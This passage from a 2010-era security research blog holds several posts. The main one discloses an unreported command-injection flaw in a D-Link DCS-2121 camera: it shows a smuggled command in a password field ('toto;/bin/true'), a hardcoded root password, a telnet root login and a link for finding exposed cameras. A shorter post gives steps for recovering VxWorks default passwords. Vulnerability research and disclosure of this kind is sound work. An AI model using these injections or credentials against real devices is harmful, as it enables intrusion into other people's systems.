<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> killall telnetd 1>/dev/null 2>/dev/null</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> fi</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">}</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">onDumpXml() {</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> xmlBegin index.xsl home-left.lang index.lang</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> resultTag $result</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> xmlEnd</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">}</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">scenario=$(basename $0 | cut -d'.' -f1)</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">. ../../xmlFunctions.sh</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">. ../../cgiMain.sh</span></span><br />
<br />
However we are going to focus on a very specific bug: "semicolon injection". In my experience, this bug plagues all and every Linux-based embedded devices, ranging from the <a href="http://www.agp.dsl.pipex.com/telnet_server.html">OrangeBox</a> (now dead link) to <a href="http://www.h-online.com/open/news/item/Root-vulnerability-in-DD-WRT-free-router-firmware-742605.html">DD-WRT</a>. Let's look for compiled CGI that might be calling system().<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">var/www/cgi/admin$ fgrep system *</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">Binary file adv_audiovideo.cgi matches</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">Binary file adv_godev.cgi matches</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">Binary file adv_sdcard.cgi matches</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">Binary file calibration.cgi matches</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">Binary file export.cgi matches</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">Binary file go_sleep.cgi matches</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">Binary file import.cgi matches</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">Binary file netWizard.cgi matches</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">Binary file pt8051_settings.cgi matches</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">Binary file pt_settings.cgi matches</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">Binary file reboot.cgi matches</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">Binary file recorder_status.cgi matches</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">Binary file recorder_test.cgi matches</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">Binary file reset.cgi matches</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">Binary file rs485_control.cgi matches</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">Binary file tools_admin.cgi matches</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">Binary file tools_system.cgi matches</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">Binary file wireless_ate.cgi matches</span></span><br />
<br />
Let's focus on those files, and look for possibly unsecure calls.<br />
<br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">$ strings -f * | grep "%s"</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">adv_godev.cgi: TinyDBError %s</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">adv_sdcard.cgi: rm -rf "%s"</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">adv_sdcard.cgi: %s/video</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">adv_sdcard.cgi: mkdir -m 0777 %s/video</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">adv_sdcard.cgi: find "%s" -type f -name "*" |wc -l</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">pt_settings.cgi: TinyDBError %s</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">recorder_test.cgi: TinyDBError %s</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">recorder_test.cgi: umount %s</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">recorder_test.cgi: mkdir -p %s</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">recorder_test.cgi: smbmount //%s/%s %s -o username=%s,password=%s</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">recorder_test.cgi: touch %s</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">rs485_control.cgi: TinyDBError %s</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">rs485_control.cgi: RS485PresetControl::%s(), unexpected command</span></span><br />
<br />
So … "recorder_test.cgi" potentially calls <b>system("smbmount //%s/%s %s -o username=%s,password=%s")</b> … Let's see if "password" parameter is properly escaped.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="http://newsoft.dyndns.org/tech/DCS_false.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://newsoft.dyndns.org/tech/DCS_false.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span class="Apple-style-span" style="font-size: small;">Try #1 with password "toto". Command result is "mntFailure".</span></td></tr>
</tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="http://newsoft.dyndns.org/tech/DCS_true.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://newsoft.dyndns.org/tech/DCS_true.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span class="Apple-style-span" style="font-size: small;">Try #2 with password "toto;/bin/true". Command result is "ok" :)</span></td></tr>
</tbody></table><br />
It is now time to start that "/usr/sbin/telnetd" server :) But wait ... what is "root" password ?<br />
<br />
"/etc/passwd" and "/etc/shadow" are symbolic links to "/tmp/passwd" and "/tmp/shadow". Those files are created at boot time by "/etc/rc.d/rc.local" script.<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">(...)</span></span><br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">start() {</span></span><br />
<span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">touch /tmp/group /tmp/passwd /tmp/shadow</span></span><br />
<span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">echo 'root:x:0:' > /etc/group</span></span><br />
<span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">echo 'root:x:0:0:Linux User,,,:/:/bin/sh' > /etc/passwd</span></span><br />
<span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">echo 'root:$1$gmEGnzIX$bFqGa1xIsjGupHyfeHXWR/:20:0:99999:7:::' > /etc/shadow</span></span><br />
<span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">#telnetd > /dev/null 2> /dev/null</span></span><br />
<span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">/bin/agent &</span></span><br />
<span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">#/sbin/syslogd</span></span><br />
<span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">addlog System is booted up.</span></span><br />
<span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">echo "rc.local start ok."</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">}</span></span><br />
<div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">(...)</span></span></div><div><br />
</div><div>So ... "root" password is hardcoded to "admin". How cool is that ? ;)</div><div><br />
</div><div><div><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">$ telnet 192.168.0.117 23</span></span></div><div><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span></div><div><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">DCS-2121 login: root</span></span></div><div><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">Password: admin</span></span></div><div><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span></div><div><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">BusyBox v1.01 (2009.07.27-09:19+0000) Built-in shell (ash)</span></span></div><div><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">Enter 'help' for a list of built-in commands.</span></span></div><div><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span></div><div><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">~ # uname -a</span></span></div><div><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">uname -a</span></span></div><div><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">Linux DCS-2121 2.4.19-pl1029 #1 Mon Jul 27 17:21:05 CST 2009 armv4l unknown</span></span></div></div><br />
<br />
<span class="Apple-style-span" style="font-size: x-large;"><b>Conclusion</b></span><br />
<br />
As often with Linux-based embedded firmwares, a trivial "semicolon injection" bug can be found with no reverse-engineering - grep is the only tool you need to reproduce this case at home.<br />
<br />
<span class="Apple-style-span" style="font-size: small;">Disclaimer (for not-so-funny people): yes this is "0day", unreported to the vendor. I even suspect the whole D-Link product line is vulnerable to the same bug (if not the whole world of low-end embedded systems (and even business class products)). However, since Web access requires authentication, this bug might be exploitable by administrators only, so it is only useful for people who would like to gain a shell on their own systems. Do not panic :)</span><br />
<span class="Apple-style-span" style="font-size: small;"><br />
</span><br />
<span class="Apple-style-span" style="font-size: small;">Bonus: <a href="http://www.shodanhq.com/?q=dcs-lig-httpd">how to find D-Link cameras on the Internet</a>.</span>newsofthttp://www.blogger.com/profile/04331742158137961313noreply@blogger.com17tag:blogger.com,1999:blog-26480225.post-73045389327673816322010-09-17T21:30:00.002+01:002010-09-17T21:30:01.110+01:00MS10-061: "this is not the 0day you are looking for"As usual, <a href="http://www.microsoft.com/technet/security/bulletin/ms10-sep.mspx">Microsoft Patch Tuesday</a> has been interesting this month.<br />
<br />
<a href="http://www.microsoft.com/technet/security/bulletin/ms10-061.mspx">MS10-061</a> flaw strikes the Spooler service, and seems to have been exploited by the infamous <a href="http://www.symantec.com/connect/de/blogs/stuxnet-introduces-first-known-rootkit-scada-devices">StuxNet worm</a>.<br />
<br />
So, has it been "0day" (as many people tend to believe - like <a href="http://expertmiami.blogspot.com/2010/09/stuxnet-et-ses-quatre-0days.html">Kostya</a>) ? (no offense man ;)<br />
<br />
I let you read that press article from <a href="http://hakin9.org/">Hakin9</a> magazine, issue n°4/2009 - you can <a href="http://newsoft.dyndns.org/tech/PrintYourShell.pdf">start reading at the bottom of page #29</a>.<br />
<br />
<br />
PS. For those of you who can read French, this article has also been quoted at the end of my "<a href="http://news0ft.blogspot.com/2009/07/lechec-de-la-securite-francaise.html">most viewed</a> (and commented)" blog post. Hidden gem :)newsofthttp://www.blogger.com/profile/04331742158137961313noreply@blogger.com5tag:blogger.com,1999:blog-26480225.post-7059080893856938552010-09-14T16:00:00.000+01:002010-09-14T16:00:08.654+01:00Rapid publishing on recent Adobe flaws<div class="MsoNormal"><span lang="EN-US" style="mso-ansi-language: EN-US;">"As usual", Adobe products (namely </span><span lang="EN-US"><a href="http://www.adobe.com/support/security/advisories/apsa10-02.html">Adobe Reader</a></span><span lang="EN-US" style="mso-ansi-language: EN-US;"> and </span><span lang="EN-US"><a href="http://www.adobe.com/support/security/advisories/apsa10-03.html">Flash Player</a></span><span lang="EN-US" style="mso-ansi-language: EN-US;">) were recently targeted by "0day" attacks in the wild.</span></div><div class="MsoNormal"><br />
</div><div class="MsoNormal"><span lang="EN-US" style="mso-ansi-language: EN-US;"></span>I did not have a look at the attacks myself, but several trusted sources (such as H. D. Moore) described the exploit as "great" because it is able to bypass DEP and ASLR on Windows Seven.</div><div class="MsoNormal"><br />
</div><div class="MsoNormal"> </div><div class="MsoNormal"><span lang="EN-US" style="mso-ansi-language: EN-US;">Various exploitation tricks have been detailed on blogs such as </span><span lang="EN-US"><a href="http://blog.metasploit.com/2010/09/return-of-unpublished-adobe.html">Metasploit</a></span><span lang="EN-US" style="mso-ansi-language: EN-US;"> and </span><span lang="EN-US"><a href="http://www.vupen.com/blog/">VUPEN</a></span><span lang="EN-US" style="mso-ansi-language: EN-US;">. ASLR bypass mostly relies on a library (namely "icucnv36.dll") not being ASLR-compatible and always being loaded at its preferred base address.</span></div><div class="MsoNormal"><br />
</div><div class="MsoNormal"><span lang="EN-US" style="mso-ansi-language: EN-US;">Now to the point: for years, I have been using </span><span lang="EN-US"><a href="http://www.erratasec.com/lookingglass.html">LookingGlass</a></span><span lang="EN-US" style="mso-ansi-language: EN-US;"> tool for preliminary triage before any application audit. It has been flying under the radar, but it works really great, and it is </span><span lang="EN-US"><s>Open Source</s></span><span lang="EN-US" style="mso-ansi-language: EN-US;"> compiled in .NET bytecode.<o:p></o:p></span></div><div class="MsoNormal"><br />
</div><div class="MsoNormal"><span lang="EN-US" style="mso-ansi-language: EN-US;">Here is the result for an up-to-date Adobe Reader 9.3.4. It looks like there are still avenues for DEP/ASLR bypass :)</span></div><div class="MsoNormal"><span lang="EN-US" style="mso-ansi-language: EN-US;"><br />
</span></div><div class="separator" style="clear: both; text-align: center;"><a href="http://newsoft.dyndns.org/tech/LookingGlass.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://newsoft.dyndns.org/tech/LookingGlass.png" /></a></div>newsofthttp://www.blogger.com/profile/04331742158137961313noreply@blogger.com1tag:blogger.com,1999:blog-26480225.post-24948470309978953502010-09-01T11:00:00.000+01:002010-09-01T11:00:00.674+01:00Follow-up on VxWorks issue<b><span class="Apple-style-span" style="font-size: x-large;">Introduction</span></b><br />
<div class="MsoNormal"><span lang="EN-US"><br />
</span></div><div class="MsoNormal"><span lang="EN-US">As a follow-up to </span><span lang="EN-US"><a href="http://blog.metasploit.com/2010/08/vxworks-vulnerabilities.html">H. D. Moore research on VxWorks</a></span><span lang="EN-US">, I would like to share some personal thoughts on the matter.<o:p></o:p></span></div><div class="MsoNormal"><br />
</div><div class="MsoNormal"><span lang="EN-US">I happen to have some experience with </span><span lang="EN-US"><a href="https://secure.wikimedia.org/wikipedia/en/wiki/VxWorks">VxWorks</a></span><span lang="EN-US">, since this operating system used to be quite popular among broadband modem manufacturers. And I have always been fascinated by those </span><span lang="EN-US"><a href="http://actes.sstic.org/SSTIC06/Securite_ADSL_en_France/">SpyBoxes</a></span><span lang="EN-US">.</span></div><div class="MsoNormal"><br />
</div><div class="MsoNormal"><span lang="EN-US">VxWorks software is now easier to get ahold of, since </span><span lang="EN-US"><a href="http://www.windriver.com/evaluations/gpp-ve/">trial/evaluation software</a></span><span lang="EN-US"> is readily available. However, by the time of VxWorks 5 (and older), things were a bit more tricky.<o:p></o:p></span></div><div class="MsoNormal"><br />
</div><div class="MsoNormal"><span lang="EN-US">HDM pointed out that VxWorks source code leaked on </span><span lang="EN-US"><a href="http://www.pudn.com/downloads115/sourcecode/embed/detail486003.html">PUDN Web site</a></span><span lang="EN-US">. As a rule of thumb, most of the world intellectual property is available from the Chinese Internet. </span>However there are many other ways to browse the source (<i>warning: all links below might disappear from the Internet without warning</i>).</div><div class="MsoNormal"></div><ul><li>Universities and student projects [<a href="http://www.cs.cmu.edu/afs/cs.cmu.edu/project/lri/vxworks/">1</a>]</li>
<li>Training courses [<a href="http://ebook.pldworld.com/_WindRiver/Tornado_VxWorks_Training/">1</a>]</li>
<li><span lang="EN-US">VxWorks enthusiasts [</span><span lang="EN-US"><a href="http://www.vxdev.com/">1</a></span><span lang="EN-US">] [</span><span lang="EN-US"><a href="http://iwiwdsmi.blogspot.com/search/label/vxworks">2</a></span><span lang="EN-US">] [</span><span lang="EN-US"><a href="http://www.xs4all.nl/~borkhuis/vxworks/vxw_pt1.html">3</a></span><span lang="EN-US">]</span></li>
<li><span lang="EN-US"></span><span lang="EN-US">Third-party SDKs (for systems that have been built on the top of VxWorks) [</span><span lang="EN-US"><a href="http://siteadvisor.pl/sites/quantumdata.com/downloads/10247794/">1</a></span><span lang="EN-US">]</span></li>
<li><span lang="EN-US"></span><span lang="EN-US">Hardware hackers [</span><span lang="EN-US"><a href="http://jjaf.de/eci/hi-focus/atu-r/telnetd/">1</a></span><span lang="EN-US">]</span></li>
</ul><div class="MsoNormal"><span lang="EN-US">In the end, whatever you are looking for, Internet has it :)<o:p></o:p></span></div><div class="MsoNormal"><br />
</div><div class="MsoNormal"><span lang="EN-US"><b><span class="Apple-style-span" style="font-size: x-large;">Authentication</span></b><o:p></o:p></span></div><div class="MsoNormal"><span lang="EN-US"><br />
</span></div><div class="MsoNormal"><span lang="EN-US">Now let's have a look at VxWorks authentication mechanism (described <a href="http://www-kryo.desy.de/documents/vxWorks/V5.5/vxworks/ref/loginLib.html">here</a> and <a href="http://www.2beanet.com/vxworks/target/src/ostool/loginLib.c.html">here</a>).</span><br />
<span lang="EN-US"><br />
</span><br />
<span lang="EN-US">Quoting <span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">usrConfig.c</span></span>:</span></div><div class="MsoNormal"><br />
</div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">(…)<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">loginInit (); /* initialize login table */<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">shellLoginInstall (loginPrompt, NULL); /* install security program */<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">/* add additional users here as required */<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">loginUserAdd (LOGIN_USER_NAME, LOGIN_PASSWORD);<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">}<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">#endif /* INCLUDE_SECURITY */<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">printLogo (); /* print out the banner page */<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">printf (" ");<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">printf ("CPU: %s. Processor #%d.\n", sysModel (), sysProcNumGet ());<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">printf (" ");<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">printf ("Memory Size: 0x%x.", sysMemTop () - (char *)LOCAL_MEM_LOCAL_ADRS);<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">printf (" BSP version %s.\n\n", bspVersion ());<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">(…)</span></span><o:p></o:p></span></div><div class="MsoNormal"><br />
</div><div class="MsoNormal"><span lang="EN-US">Authentication is optional – <span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">#INCLUDE_SECURITY</span></span> must be defined at compile time.<o:p></o:p></span><br />
<span lang="EN-US"><br />
</span></div><div class="MsoNormal"><span lang="EN-US">By default, <span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">loginUserAdd()</span></span> must be called for creating each user account dynamically - there is no user/password "file" (since there might be no filesystem at all on the target system).<o:p></o:p></span><br />
<span lang="EN-US"><br />
</span></div><div class="MsoNormal"><span lang="EN-US">Password is "encrypted" using a VxWorks-proprietary algorithm. </span>Quoting <a href="http://www.xs4all.nl/~borkhuis/vxworks/vxw_pt1.html">http://www.xs4all.nl/~borkhuis/vxworks/vxw_pt1.html</a>:</div><div class="MsoNormal"><blockquote>"<i>Q: How can I create (encrypted) passwords?</i></blockquote></div><div class="MsoNormal"><blockquote><i>A: You can use vxencrypt that comes with Tornado to create passwords, but it is pretty weak.</i></blockquote></div><div class="MsoNormal"><blockquote><i>I think it is sum( p[i] * i ^ i )) * 0x1e3a1d5 converted to ascii with a munged hex character set (presumably to make you think there are more than 2^32 encrypted passwords). I think I could reverse that using pen and paper.</i>"</blockquote>Therefore it is possible to log into any VxWorks 5 system in default configuration, given the following steps:</div><div class="MsoNormal"><br />
<ul><li>Grab a copy of the firmware (more about this later)</li>
<li>Find the banner printing code</li>
<li>Look a few opcodes before - you will presumably find call(s) to <span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">loginUserAdd()</span></span>.</li>
<li>Reverse passwords (using pen and paper ;)</li>
</ul></div><div class="MsoNormal"><b><span class="Apple-style-span" style="font-size: x-large;">Practical use case</span></b><br />
<br />
</div><div class="MsoNormal"><span lang="EN-US">Let's take the <a href="http://assistance.sfr.fr/internet_trio3C/accueil/votre-assistance/as-743-65855">Trio3C</a> broadband modem that has been widely distributed by <a href="http://fr.wikipedia.org/wiki/Neuf_Telecom">Neuf Telecom</a> a few years ago. This model has been superseded by the <a href="http://www.neufbox4.org/">NeufBox4</a>, and you could find second-hand modems for less than 5 euros nowadays. </span>Trio3C appears to be running under VxWorks 5, and to have remote debugging enabled.</div><div class="MsoNormal"><span lang="EN-US"><br />
</span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">$ ./msfconsole <o:p></o:p></span></span></span></div><div class="MsoNormal"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> _ _ _ _<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> | | | | (_) |<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> _ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">| | | | | | __/ || (_| \__ \ |_) | | (_) | | 